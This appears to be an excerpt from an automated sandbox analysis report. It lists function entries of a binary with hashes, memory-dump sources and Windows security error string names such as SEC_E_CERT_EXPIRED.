                                      • Instruction ID: d12a6ad383ddf37975bd8c54b14ab5e8d832f8ea3f2519690b5b29ec8ba3cc20
                                      • Opcode Fuzzy Hash: 973212ccd0867228b92a0ba13a3e1da5f0c8bf4ecced34b26a802e2d60853c05
                                      • Instruction Fuzzy Hash: 58012C2560D94296F755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3CA449A2B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_UNFINISHED_CONTEXT_DELETED
                                      • API String ID: 2544740495-3072354809
                                      • Opcode ID: 4d68d1d01c927f77f1b2e0b141170b6e7c82e59eb3f583db455e42859803b420
                                      • Instruction ID: 1d700d660d1a114eead6757257d2f7e0d262fd402740910abed71888724ca29b
                                      • Opcode Fuzzy Hash: 4d68d1d01c927f77f1b2e0b141170b6e7c82e59eb3f583db455e42859803b420
                                      • Instruction Fuzzy Hash: 37012C2560D94296F755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3CA449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_UNKNOWN_CREDENTIALS
                                      • API String ID: 2544740495-23602836
                                      • Opcode ID: d4f2dc6d101ccb2df0d0913de69ed71cfad314068b2ea64795196b912f46502e
                                      • Instruction ID: 0c0e999e8630e0e8b432b3ec0320baa4d457d10d8a767cadc0c256da7d303900
                                      • Opcode Fuzzy Hash: d4f2dc6d101ccb2df0d0913de69ed71cfad314068b2ea64795196b912f46502e
                                      • Instruction Fuzzy Hash: 91012C2560D9429AF755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_TARGET_UNKNOWN
                                      • API String ID: 2544740495-4056133115
                                      • Opcode ID: 08b56b9d40f55a3b8ee249dfe147ca408a5fd830278aa069b37bacf9866c5f53
                                      • Instruction ID: 653ab4b823597517da8332d99feda992ee9f2abea878bec332e43b16e0bac80f
                                      • Opcode Fuzzy Hash: 08b56b9d40f55a3b8ee249dfe147ca408a5fd830278aa069b37bacf9866c5f53
                                      • Instruction Fuzzy Hash: 76012C2560D94296F755BF61A0142BCE311AF4CBA1FC50075CA2E067D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_TIME_SKEW
                                      • API String ID: 2544740495-680912890
                                      • Opcode ID: 1b9e77e400347b79f99435d99fe8c2f11b4d9b5c35332718bf7d8800c1b63fd9
                                      • Instruction ID: 4d3c6fb3a223089bbfdb0dbc24ca66e5f3e5b2d12032cfe8d84844f48a1769ec
                                      • Opcode Fuzzy Hash: 1b9e77e400347b79f99435d99fe8c2f11b4d9b5c35332718bf7d8800c1b63fd9
                                      • Instruction Fuzzy Hash: BB014F2560D94296F759BF61A0142BCE311AF4CBA1FC50075CE2E037D1CF3C9449A3B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_TOO_MANY_PRINCIPALS
                                      • API String ID: 2544740495-588335900
                                      • Opcode ID: 9f700a4d3f636f910e0a1d8d048eedc72245f7d623259e447465c646a032101b
                                      • Instruction ID: 5bee26ffd4f753badc5047111a2321b503b208c8d2785017ed88c6c58400020f
                                      • Opcode Fuzzy Hash: 9f700a4d3f636f910e0a1d8d048eedc72245f7d623259e447465c646a032101b
                                      • Instruction Fuzzy Hash: 14012C2560D94296F755BB61A0182BCE311AF4CBA1FC50075CA2E027D1CF3C9449A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_DOWNGRADE_DETECTED
                                      • API String ID: 2544740495-4027265317
                                      • Opcode ID: 06119177f76b92adc406de657f1f5c1e6342a8914643e70863c5da2e8105c10f
                                      • Instruction ID: 45ddc3ce65b010c7fd063d5c56b0982374418fc756d4ab559ec0d71e5c15166e
                                      • Opcode Fuzzy Hash: 06119177f76b92adc406de657f1f5c1e6342a8914643e70863c5da2e8105c10f
                                      • Instruction Fuzzy Hash: 1D01FF2560D94696F759BF61A0142BCE311AF5CBA5FC50075CE2E077D1CF3C9849A3B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_ENCRYPT_FAILURE
                                      • API String ID: 2544740495-3247260902
                                      • Opcode ID: fc7bbb49d88e6a8d5e00264acd789ea11858ce57661fe84bbf87e68b6f815ba5
                                      • Instruction ID: 2c809242e23c988f2225d65337ba1e584aae1f1fb6dd887576f25f85ec27e8ad
                                      • Opcode Fuzzy Hash: fc7bbb49d88e6a8d5e00264acd789ea11858ce57661fe84bbf87e68b6f815ba5
                                      • Instruction Fuzzy Hash: DD014F2560D94296F755BF61A0142BCE311AF4CBA1FC50075CE2E037D1CF3C9849A3B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_DECRYPT_FAILURE
                                      • API String ID: 2544740495-927900899
                                      • Opcode ID: 4971c33ed4d89050027657bf57fecd209b12e35fd3d837aeff4a681cca2052ed
                                      • Instruction ID: 5ce91643b4580bfc122ccfaeda228db4be547e0d4f0d18d384bc0f3e1c829efc
                                      • Opcode Fuzzy Hash: 4971c33ed4d89050027657bf57fecd209b12e35fd3d837aeff4a681cca2052ed
                                      • Instruction Fuzzy Hash: D001EC2560D94696F759BF61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_DELEGATION_POLICY
                                      • API String ID: 2544740495-517742998
                                      • Opcode ID: 884a30123dd02074d5dca50b448c1ca9c70cc957a3e5131ec81daab3b70592f4
                                      • Instruction ID: 603c1b233d0e323e5dc73353dcae84aebcfe61d97518ba8d79f939b089538348
                                      • Opcode Fuzzy Hash: 884a30123dd02074d5dca50b448c1ca9c70cc957a3e5131ec81daab3b70592f4
                                      • Instruction Fuzzy Hash: 59012C2560D94296F755BB61A0142BCE311AF4CBA5FC50075CA2E027D1CF3C9849A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_DELEGATION_REQUIRED
                                      • API String ID: 2544740495-1240544088
                                      • Opcode ID: 7d3ddc84a2b611b204b5a948a41059ffd180738bee72042b6ad79dab8588ea97
                                      • Instruction ID: 15b161355c8f15015ab2bcc2536c7065d86da9c2f35bdf93cfe378cffc1d4ed6
                                      • Opcode Fuzzy Hash: 7d3ddc84a2b611b204b5a948a41059ffd180738bee72042b6ad79dab8588ea97
                                      • Instruction Fuzzy Hash: FE01FF2560D94696F755BF61A0142BCE311AF5CBA5FC50075CE2E077D1CF3C9849A3B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_CONTEXT_EXPIRED
                                      • API String ID: 2544740495-1501973646
                                      • Opcode ID: dfc76429ef52e494065cc4d85cb53e6da6e2f7e519051e86ea1df54f7158e112
                                      • Instruction ID: 60f00e283bd4e97c497733440658f6654c1af4f8f3b2ec41ede3bf907a571ca7
                                      • Opcode Fuzzy Hash: dfc76429ef52e494065cc4d85cb53e6da6e2f7e519051e86ea1df54f7158e112
                                      • Instruction Fuzzy Hash: 4501EC2560D94696F755BF71A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_CROSSREALM_DELEGATION_FAILURE
                                      • API String ID: 2544740495-1734344644
                                      • Opcode ID: ae32f364118637ad00afb3653030329906ec909127810c3e51e91090530be498
                                      • Instruction ID: 016e372050213d963b370792e1da148dcf1bd0f4799b342c6d33eeceb5189f07
                                      • Opcode Fuzzy Hash: ae32f364118637ad00afb3653030329906ec909127810c3e51e91090530be498
                                      • Instruction Fuzzy Hash: 9401EC2560D946D6F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_CRYPTO_SYSTEM_INVALID
                                      • API String ID: 2544740495-1517516476
                                      • Opcode ID: ad4548a47a1f82779d16a46da15ae85a1fd6e127cc13e302e2b2ba19efe5ac4f
                                      • Instruction ID: f3f74b10e739b8ccc3c61f5b91c6857518009a55088b4fa50a06843d8285a27f
                                      • Opcode Fuzzy Hash: ad4548a47a1f82779d16a46da15ae85a1fd6e127cc13e302e2b2ba19efe5ac4f
                                      • Instruction Fuzzy Hash: 6401EC2560DA4696F755BB61A0142BCE311AF5CBA5FC50075CA2E077D1CF3CA449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_CERT_UNKNOWN
                                      • API String ID: 2544740495-2007521339
                                      • Opcode ID: 035a250fa00b015db1fc9946b93f758df49a2f3418e66358b7aab6d4f5f2d6b6
                                      • Instruction ID: 999b00ce04c7da19a8faf6a7168fdff03c05184ca8d7387cac323c0273310100
                                      • Opcode Fuzzy Hash: 035a250fa00b015db1fc9946b93f758df49a2f3418e66358b7aab6d4f5f2d6b6
                                      • Instruction Fuzzy Hash: 02012C2560D94296F755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_CERT_WRONG_USAGE
                                      • API String ID: 2544740495-764331422
                                      • Opcode ID: dbae3221a14e67816685da3d06e4906bccb1adc45336976caae83bb5da933b08
                                      • Instruction ID: 4ebf11dbec92ceb158d7df6d316166324413174410a2bf0c8b66d5c8c7b3d2f8
                                      • Opcode Fuzzy Hash: dbae3221a14e67816685da3d06e4906bccb1adc45336976caae83bb5da933b08
                                      • Instruction Fuzzy Hash: 5B01EC2560D946D6F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_CANNOT_INSTALL
                                      • API String ID: 2544740495-355282904
                                      • Opcode ID: 42cfa13e420642d59810f35ef37644174fe91466f1d7b6ee93156bc9ee86c13e
                                      • Instruction ID: 47eee08232f97b58a30720317cdd8fca9a8e9293c7e57520e82290f5675f72cb
                                      • Opcode Fuzzy Hash: 42cfa13e420642d59810f35ef37644174fe91466f1d7b6ee93156bc9ee86c13e
                                      • Instruction Fuzzy Hash: A701EC2560D946D6F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_CANNOT_PACK
                                      • API String ID: 2544740495-3415512108
                                      • Opcode ID: ba59c7f3d15e17c2e9eb1c20340d2f764d3eb529ba5ac423a12f02bc3e93c5eb
                                      • Instruction ID: 987b27ab90b9fc1679a4c6bda918d196122878b9981df501c2db718b635c203a
                                      • Opcode Fuzzy Hash: ba59c7f3d15e17c2e9eb1c20340d2f764d3eb529ba5ac423a12f02bc3e93c5eb
                                      • Instruction Fuzzy Hash: 2201EC2560D94696F755BB61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_CERT_EXPIRED
                                      • API String ID: 2544740495-3284210359
                                      • Opcode ID: a5ca190e9d83c6233305593e2991ab3d52bd714a0bead48d49639c8e5069add4
                                      • Instruction ID: 5418b409cd2b95a88f83ecb55cf4c468f83291dbee49d4bed5ee443b922f6bc8
                                      • Opcode Fuzzy Hash: a5ca190e9d83c6233305593e2991ab3d52bd714a0bead48d49639c8e5069add4
                                      • Instruction Fuzzy Hash: 9501EC2560D946D6F755BB61A0182BCE311AF5CBA5FC90075CA2E067D1CF3CA449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_BAD_BINDINGS
                                      • API String ID: 2544740495-2221957427
                                      • Opcode ID: 634f1e0a1f4724e898f9b5aa7ec7593d40f326e753c7d7c7d9056edf4197a870
                                      • Instruction ID: aa87f8c6fef1efa8caffe7ab9665003024e4fb378748bc07f2c82e7c7f4a6424
                                      • Opcode Fuzzy Hash: 634f1e0a1f4724e898f9b5aa7ec7593d40f326e753c7d7c7d9056edf4197a870
                                      • Instruction Fuzzy Hash: 3B012C2560D94296F755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3C9449A2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast_errno$__swprintf_lstrncpy
                                      • String ID: SEC_E_BAD_PKGID
                                      • API String ID: 2544740495-630439053
                                      • Opcode ID: c84fdb9044b40a2b78d917f5162a8be5d1877f63145fc5db64a7ddc7578194d4
                                      • Instruction ID: ad2839bad7be7a545a24fbdccf65687bfaca793f4a0da524824481423077964a
                                      • Opcode Fuzzy Hash: c84fdb9044b40a2b78d917f5162a8be5d1877f63145fc5db64a7ddc7578194d4
